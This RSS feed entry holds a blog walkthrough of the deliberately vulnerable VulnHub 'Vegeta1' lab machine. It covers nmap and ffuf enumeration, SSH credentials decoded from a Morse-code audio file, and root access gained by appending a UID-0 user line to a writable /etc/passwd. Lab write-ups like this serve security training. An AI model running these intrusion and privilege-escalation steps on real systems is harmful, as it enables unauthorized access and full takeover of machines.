<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Chinmay Patel</title>
    <description>The latest articles on DEV Community by Chinmay Patel (@overclockinferno).</description>
    <link>https://dev.to/overclockinferno</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F857610%2F360ae431-ce9b-4a2b-8060-1c73c32971ff.jpg</url>
      <title>DEV Community: Chinmay Patel</title>
      <link>https://dev.to/overclockinferno</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/overclockinferno"/>
    <language>en</language>
    <item>
      <title>VulnHub - Vegeta1 - Walkthrough</title>
      <dc:creator>Chinmay Patel</dc:creator>
      <pubDate>Wed, 04 May 2022 14:50:12 +0000</pubDate>
      <link>https://dev.to/overclockinferno/vulnhub-vegeta1-walkthrough-3lkn</link>
      <guid>https://dev.to/overclockinferno/vulnhub-vegeta1-walkthrough-3lkn</guid>
      <description>&lt;h2&gt;
  
  
  Metadata
&lt;/h2&gt;

&lt;p&gt;IP: 192.168.120.73&lt;br&gt;
Difficulty: Easy&lt;/p&gt;
&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;This machine is exploited by recovering SSH credentials from a Morse code inside an audio file. Privileges escalated by abusing misconfigured file permissions on &lt;strong&gt;/etc/passwd&lt;/strong&gt;.&lt;/p&gt;
&lt;h2&gt;
  
  
  Enumeration
&lt;/h2&gt;
&lt;h3&gt;
  
  
  Nmap
&lt;/h3&gt;

&lt;p&gt;We start off by running an &lt;code&gt;nmap&lt;/code&gt; scan:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;nmap &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-oA&lt;/span&gt; initial 192.168.120.73
Starting Nmap 7.92 &lt;span class="o"&gt;(&lt;/span&gt; https://nmap.org &lt;span class="o"&gt;)&lt;/span&gt; at 2022-02-27 17:56 EST
Nmap scan report &lt;span class="k"&gt;for &lt;/span&gt;192.168.120.73
Host is up &lt;span class="o"&gt;(&lt;/span&gt;0.033s latency&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;
Not shown: 998 closed tcp ports &lt;span class="o"&gt;(&lt;/span&gt;reset&lt;span class="o"&gt;)&lt;/span&gt;
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 &lt;span class="o"&gt;(&lt;/span&gt;protocol 2.0&lt;span class="o"&gt;)&lt;/span&gt;
| ssh-hostkey: 
|   2048 1f:31:30:67:3f:08:30:2e:6d:ae:e3:20:9e:bd:6b:ba &lt;span class="o"&gt;(&lt;/span&gt;RSA&lt;span class="o"&gt;)&lt;/span&gt;
|   256 7d:88:55:a8:6f:56:c8:05:a4:73:82:dc:d8:db:47:59 &lt;span class="o"&gt;(&lt;/span&gt;ECDSA&lt;span class="o"&gt;)&lt;/span&gt;
|_  256 cc:de:de:4e:84:a8:91:f5:1a:d6:d2:a6:2e:9e:1c:e0 &lt;span class="o"&gt;(&lt;/span&gt;ED25519&lt;span class="o"&gt;)&lt;/span&gt;
80/tcp open  http    Apache httpd 2.4.38 &lt;span class="o"&gt;((&lt;/span&gt;Debian&lt;span class="o"&gt;))&lt;/span&gt;
|_http-title: Site doesn&lt;span class="s1"&gt;'t have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Port 80
&lt;/h2&gt;

&lt;p&gt;Let’s navigate to port 80 through a web browser. By exploring IP in the URL box, it puts up following web page as shown in the below image.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu3iklzde7ccuj0b4u9zt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu3iklzde7ccuj0b4u9zt.png" alt="Vegeta1 Homepage" width="800" height="481"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Ffuf
&lt;/h3&gt;

&lt;p&gt;Next, run a &lt;code&gt;ffuf&lt;/code&gt; scan with the wordlist &lt;strong&gt;/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt&lt;/strong&gt; as follows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;ffuf &lt;span class="nt"&gt;-w&lt;/span&gt; /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt &lt;span class="nt"&gt;-u&lt;/span&gt; http://192.168.120.73/FUZZ &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="nt"&gt;-v&lt;/span&gt; &lt;span class="nt"&gt;-fs&lt;/span&gt; 119

        /&lt;span class="s1"&gt;'___\  /'&lt;/span&gt;___&lt;span class="se"&gt;\ &lt;/span&gt;          /&lt;span class="s1"&gt;'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive &amp;lt;3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.120.73/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response size: 119
________________________________________________

[Status: 301, Size: 314, Words: 20, Lines: 10]
| URL | http://192.168.120.73/img
| --&amp;gt; | http://192.168.120.73/img/
    * FUZZ: img

[Status: 301, Size: 316, Words: 20, Lines: 10]
| URL | http://192.168.120.73/image
| --&amp;gt; | http://192.168.120.73/image/
    * FUZZ: image

[Status: 301, Size: 316, Words: 20, Lines: 10]
| URL | http://192.168.120.73/admin
| --&amp;gt; | http://192.168.120.73/admin/
    * FUZZ: admin

[Status: 301, Size: 317, Words: 20, Lines: 10]
| URL | http://192.168.120.73/manual
| --&amp;gt; | http://192.168.120.73/manual/
    * FUZZ: manual

[Status: 403, Size: 279, Words: 20, Lines: 10]
| URL | http://192.168.120.73/server-status
    * FUZZ: server-status

[Status: 301, Size: 316, Words: 20, Lines: 10]
| URL | http://192.168.120.73/bulma
| --&amp;gt; | http://192.168.120.73/bulma/
    * FUZZ: bulma

:: Progress: [207643/207643] :: Job [1/1] :: 1721 req/sec :: Duration: [0:02:32] :: Errors: 0 ::
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;From this scan, directory &lt;em&gt;/bulma&lt;/em&gt; is discovered.&lt;/p&gt;

&lt;h3&gt;
  
  
  Web Enumeration
&lt;/h3&gt;

&lt;p&gt;When we explored &lt;a href="http://192.168.120.161/bulma/" rel="noopener noreferrer"&gt;http://192.168.120.161/bulma/&lt;/a&gt; in browser, we locate a wav file &lt;strong&gt;hahahaha.wav&lt;/strong&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm3s4qrkdalsw5lh8qpv8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm3s4qrkdalsw5lh8qpv8.png" alt="Vegeta1 wavFile" width="793" height="349"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We will download this file for further investigation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;wget http://192.168.120.73/bulma/hahahaha.wav
&lt;span class="nt"&gt;--2022-02-27&lt;/span&gt; 18:55:03--  http://192.168.120.73/bulma/hahahaha.wav
Connecting to 192.168.120.73:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 236124 &lt;span class="o"&gt;(&lt;/span&gt;231K&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;audio/x-wav]
Saving to: ‘hahahaha.wav’

hahahaha.wav         100%[&lt;span class="o"&gt;==============================================&amp;gt;]&lt;/span&gt; 230.59K   593KB/s    &lt;span class="k"&gt;in &lt;/span&gt;0.4s    

2022-02-27 18:55:03 &lt;span class="o"&gt;(&lt;/span&gt;593 KB/s&lt;span class="o"&gt;)&lt;/span&gt; - ‘hahahaha.wav’ saved &lt;span class="o"&gt;[&lt;/span&gt;236124/236124]

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Exploitation
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Morse Code
&lt;/h3&gt;

&lt;p&gt;Listening to the wav file, it sounds like Morse code. By using an online Morse code audio decoder &lt;a href="https://morsecode.world/international/decoder/audio-decoder-adaptive.html" rel="noopener noreferrer"&gt;https://morsecode.world/international/decoder/audio-decoder-adaptive.html&lt;/a&gt;, we obtain the following message:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ATTTTTTTTTT7 TRUNKS PASSWORD : US3R(S IN DOLLARS SYMBOL)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This can be interpreted as:&lt;/p&gt;

&lt;p&gt;Username: &lt;code&gt;TRUNKS&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Password: &lt;code&gt;U$3R&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  SSH
&lt;/h3&gt;

&lt;p&gt;We will try the username password pair &lt;code&gt;trunks:u$3r&lt;/code&gt; to SSH into the target:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;ssh trunks@192.168.120.73    
&lt;span class="o"&gt;[&lt;/span&gt;...]
trunks@192.168.120.73&lt;span class="s1"&gt;'s password: 
Linux Vegeta 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
[...]
trunks@Vegeta:~$ id
uid=1000(trunks) gid=1000(trunks) groups=1000(trunks),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
trunks@Vegeta:~$ 

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Privilege Escalation
&lt;/h2&gt;

&lt;p&gt;Initial try to look for the sudo permissions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;trunks@Vegeta:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
&lt;span class="nt"&gt;-bash&lt;/span&gt;: &lt;span class="nb"&gt;sudo&lt;/span&gt;: &lt;span class="nb"&gt;command &lt;/span&gt;not found
trunks@Vegeta:~&lt;span class="nv"&gt;$ &lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No luck there.&lt;/p&gt;

&lt;p&gt;In the home directory &lt;em&gt;/home/trunks/&lt;/em&gt;, file &lt;strong&gt;.bash_history&lt;/strong&gt; is present:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;trunks@Vegeta:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-al&lt;/span&gt;
total 32
drwxr-xr-x 3 trunks trunks 4096 Aug 12  2020 &lt;span class="nb"&gt;.&lt;/span&gt;
drwxr-xr-x 3 root   root   4096 Jun 28  2020 ..
&lt;span class="nt"&gt;-rw-------&lt;/span&gt; 1 trunks trunks  382 Jun 28  2020 .bash_history
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 trunks trunks  220 Jun 28  2020 .bash_logout
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 trunks trunks 3526 Jun 28  2020 .bashrc
drwxr-xr-x 3 trunks trunks 4096 Jun 28  2020 .local
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 trunks trunks   33 Feb 28 04:14 local.txt
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 trunks trunks  807 Jun 28  2020 .profile
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We find following content from the file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;trunks@Vegeta:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; .bash_history 
perl &lt;span class="nt"&gt;-le&lt;/span&gt; ‘print crypt&lt;span class="o"&gt;(&lt;/span&gt;“Password@973″,”addedsalt”&lt;span class="o"&gt;)&lt;/span&gt;’
perl &lt;span class="nt"&gt;-le&lt;/span&gt; &lt;span class="s1"&gt;'print crypt("Password@973","addedsalt")'&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; /etc/passwd[/sh]
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; /etc/passwd
&lt;span class="nb"&gt;ls
&lt;/span&gt;su Tom
&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-la&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; .bash_history 
&lt;span class="nb"&gt;sudo &lt;/span&gt;apt-get &lt;span class="nb"&gt;install &lt;/span&gt;vim
apt-get &lt;span class="nb"&gt;install &lt;/span&gt;vim
su root
&lt;span class="nb"&gt;cat&lt;/span&gt; .bash_history 
&lt;span class="nb"&gt;exit&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It looks like user &lt;code&gt;Tom&lt;/code&gt; was created; however, user Tom does not exist in &lt;strong&gt;/etc/passwd&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;trunks@Vegeta:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; /etc/passwd | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="s2"&gt;"Tom"&lt;/span&gt;
trunks@Vegeta:~&lt;span class="err"&gt;$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Moreover, checking file permissions of &lt;strong&gt;/etc/passwd&lt;/strong&gt;, the user &lt;code&gt;trunks&lt;/code&gt; has write permission to it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;trunks@Vegeta:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-al&lt;/span&gt; /etc/passwd
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 trunks root 1486 Jun 28  2020 /etc/passwd
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We can use the contents from &lt;strong&gt;/home/trunks/.bash_history&lt;/strong&gt; to append user Tom to &lt;strong&gt;/etc/passwd&lt;/strong&gt;. We can escalate our privilege to root as follows (password will be &lt;code&gt;Password@973&lt;/code&gt;):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;trunks@Vegeta:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; /etc/passwd
trunks@Vegeta:~&lt;span class="nv"&gt;$ &lt;/span&gt;su Tom
Password: 
root@Vegeta:/home/trunks# &lt;span class="nb"&gt;id
&lt;/span&gt;&lt;span class="nv"&gt;uid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0&lt;span class="o"&gt;(&lt;/span&gt;root&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;gid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0&lt;span class="o"&gt;(&lt;/span&gt;root&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nb"&gt;groups&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0&lt;span class="o"&gt;(&lt;/span&gt;root&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Proof
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;root@Vegeta:~# &lt;span class="nb"&gt;hostname&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;whoami&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;cat &lt;/span&gt;proof.txt &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; ip a
Vegeta
root
a91[...]
1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    &lt;span class="nb"&gt;link&lt;/span&gt;/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens35: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    &lt;span class="nb"&gt;link&lt;/span&gt;/ether 00:50:56:bf:67:0d brd ff:ff:ff:ff:ff:ff
    inet 192.168.120.73/24 brd 192.168.120.255 scope global ens35
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:febf:670d/64 scope &lt;span class="nb"&gt;link 
       &lt;/span&gt;valid_lft forever preferred_lft forever
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



</description>
    </item>
  </channel>
</rss>
